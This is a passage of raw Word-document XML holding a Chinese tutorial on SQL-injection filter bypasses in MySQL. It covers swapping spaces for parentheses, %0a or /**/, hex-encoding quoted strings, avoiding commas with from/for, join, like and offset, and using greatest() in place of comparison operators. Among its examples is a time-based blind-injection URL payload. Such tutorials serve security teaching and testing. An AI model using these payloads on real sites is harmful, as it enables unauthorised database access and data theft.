        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="69" w:name="u99c9a4a2"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="333333"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>如果在尝试注入过程中，发现空格被过滤，那么可以去尝试括号是否被过滤，如果括号未被过滤，那么就可以尝试用括号进行绕过。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="69"/>
    <w:p w14:paraId="29B00EF0">
      <w:pPr>
        <w:spacing w:beforeLines="100" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="70" w:name="udabbbdb5"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="333333"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>因为在mysql中，括号是用来包围子查询的。因此，任何可以计算出结果的语句，多可以用括号围起来。而括号的两端可以没有多余的空格</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="70"/>
    <w:p w14:paraId="665AAB67">
      <w:pPr>
        <w:spacing w:beforeLines="100" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="71" w:name="u4f3cfc8d"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="333333"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>例如：</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="71"/>
    <w:p w14:paraId="4882B65E">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72" w:name="frkLC"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Select(user())fromdualwhere(1=1)and(2=2)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="72"/>
    <w:p w14:paraId="5B0B1464">
      <w:pPr>
        <w:spacing w:beforeLines="100" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="73" w:name="uaab9537a"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="333333"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>这种过滤方式常常用于基于时间的盲注</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="73"/>
    <w:p w14:paraId="19C06A73">
      <w:pPr>
        <w:spacing w:beforeLines="100" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="74" w:name="uba87cd5d"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="333333"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>例如：</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="74"/>
    <w:p w14:paraId="3C29CFF0">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75" w:name="HVPeP"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>?id=1'and(sleep(ascii(sbustr(database()from(1)for(1)))=109))%23</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="75"/>
    <w:p w14:paraId="236A6703">
      <w:pPr>
        <w:spacing w:beforeLines="100" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="76" w:name="ua098b4f8"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>其中</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>from(1)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>for(1)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>属于逗号绕过</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="76"/>
    <w:p w14:paraId="54EE8F3D">
      <w:pPr>
        <w:spacing w:beforeLines="100" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="77" w:name="u4a329a85"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>其它方式</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="77"/>
    <w:p w14:paraId="0C4C0EA2">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78" w:name="GytBh"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>两个空格代替一个空格</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>用tab代替空格</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>%0a代替空格</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>/**/ 替代空格</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="78"/>
    <w:p w14:paraId="7EB1EB9D">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:beforeLines="100" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="79" w:name="YUG1l"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
        </w:rPr>
        <w:t>2.5、引号绕过</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="79"/>
    <w:p w14:paraId="345C3687">
      <w:pPr>
        <w:spacing w:beforeLines="100" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="80" w:name="uc6dd986b"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>只针对这种情况有效</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="80"/>
    <w:p w14:paraId="71C2BB7C">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81" w:name="leaoY"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Select column_name from information_schema.columns where table_name= ’users’</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Users的十六进制字符串是7573657273，那么利用十六进制编码绕过后的查询语句就变成了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Select column_name from information_schema.columns where table_name=7573657273</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="81"/>
    <w:p w14:paraId="23A0A792">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:beforeLines="100" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="82" w:name="u34363817"/>
      <w:bookmarkEnd w:id="82"/>
      <w:bookmarkStart w:id="83" w:name="U5iH5"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
        </w:rPr>
        <w:t>2.6、逗号绕过</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="83"/>
    <w:p w14:paraId="7F45D48D">
      <w:pPr>
        <w:spacing w:beforeLines="100" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="84" w:name="ub893656d"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="333333"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>在使用盲注的时候，需要使用到substr()，mid()，limit。这些子句方法都需要使用到逗号。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="84"/>
    <w:p w14:paraId="5F433F67">
      <w:pPr>
        <w:spacing w:beforeLines="100" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="85" w:name="u62fab329"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="333333"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">对于substr()和mid()这两个方法都可以使用from </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="333333"/>
          <w:sz w:val="22"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>for</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="333333"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>方式来尝试绕过：</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="85"/>
    <w:p w14:paraId="1148068B">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86" w:name="Q0ysJ"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Select substr(database() from 1 for 1);</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Select mid(database() from 1 for 1);</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:bookmarkStart w:id="154" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="154"/>
    </w:p>
    <w:bookmarkEnd w:id="86"/>
    <w:p w14:paraId="3F36139C">
      <w:pPr>
        <w:spacing w:beforeLines="100" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="87" w:name="u1f4822b6"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>使用join</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="87"/>
    <w:p w14:paraId="60A31E63">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88" w:name="E0IeR"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Union select 1,2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>等价于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>union select * from(select 1)a join (select 2)b</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="88"/>
    <w:p w14:paraId="5E25E5B4">
      <w:pPr>
        <w:spacing w:beforeLines="100" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="89" w:name="u3c869a0c"/>
      <w:bookmarkStart w:id="90" w:name="u48bd9f06"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3521710" cy="777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522133" cy="777750"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:bookmarkEnd w:id="89"/>
    </w:p>
    <w:bookmarkEnd w:id="90"/>
    <w:p w14:paraId="5D8FD698">
      <w:pPr>
        <w:spacing w:beforeLines="100" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="91" w:name="u3adf4450"/>
      <w:bookmarkStart w:id="92" w:name="ufb0c13b2"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3759200"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759200" cy="914781"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:bookmarkEnd w:id="91"/>
    </w:p>
    <w:bookmarkEnd w:id="92"/>
    <w:p w14:paraId="255FD767">
      <w:pPr>
        <w:spacing w:beforeLines="100" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="93" w:name="u64123ec2"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>使用like</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="93"/>
    <w:p w14:paraId="69B73578">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94" w:name="ssEjY"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Select ascii(mid(user(),1,1))=80</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>等价于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>select user() like ‘r%’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="94"/>
    <w:p w14:paraId="70335678">
      <w:pPr>
        <w:spacing w:beforeLines="100" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="95" w:name="ua6fbe5f7"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>使用offset绕过</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="95"/>
    <w:p w14:paraId="71671521">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96" w:name="YlU6k"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Select * from news limit 0,1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>等价于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>select * from news limit 1 offset 0</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含义是从第0条（不包括）数据开始取出1条数据，limit后面跟的是1条数据，offset后面是从第0条开始读取，即读取第1条</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="96"/>
    <w:p w14:paraId="476DFD3A">
      <w:pPr>
        <w:spacing w:beforeLines="100" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="97" w:name="u26f00989"/>
      <w:bookmarkStart w:id="98" w:name="ud69d1279"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4013200" cy="8820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013200" cy="882104"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:bookmarkEnd w:id="97"/>
    </w:p>
    <w:bookmarkEnd w:id="98"/>
    <w:p w14:paraId="19A7753F">
      <w:pPr>
        <w:spacing w:beforeLines="100" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="99" w:name="u205fb7fd"/>
      <w:bookmarkStart w:id="100" w:name="ue07f525b"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3962400" cy="7759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3962400" cy="776250"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:bookmarkEnd w:id="99"/>
    </w:p>
    <w:bookmarkEnd w:id="100"/>
    <w:p w14:paraId="1708C763">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:beforeLines="100" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="101" w:name="iLvrr"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
        </w:rPr>
        <w:t>2.7、比较符号(&lt;&gt;)绕过</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="101"/>
    <w:p w14:paraId="33466E4E">
      <w:pPr>
        <w:spacing w:beforeLines="100" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="102" w:name="u0e9af691"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>在SQL盲注中常常会使用到&lt;&gt;，当比较字符被拦截时，可以尝试以下方法绕过</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="102"/>
    <w:p w14:paraId="135AC67A">
      <w:pPr>
        <w:spacing w:beforeLines="100" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="103" w:name="ubc189fc4"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="333333"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Greatest()：返回最大值</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="103"/>
    <w:p w14:paraId="092F6B34">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04" w:name="e1FXM"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>使用N个参数，并返回N个参数中的最大值</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Greatest(value1,value2,…)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="104"/>
    <w:p w14:paraId="0630253C">
      <w:pPr>
        <w:spacing w:beforeLines="100" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="105" w:name="u90a4fe91"/>
      <w:bookmarkStart w:id="106" w:name="u8edaeddc"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3894455" cy="7448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894667" cy="745320"/>
                    </a:xfrm>
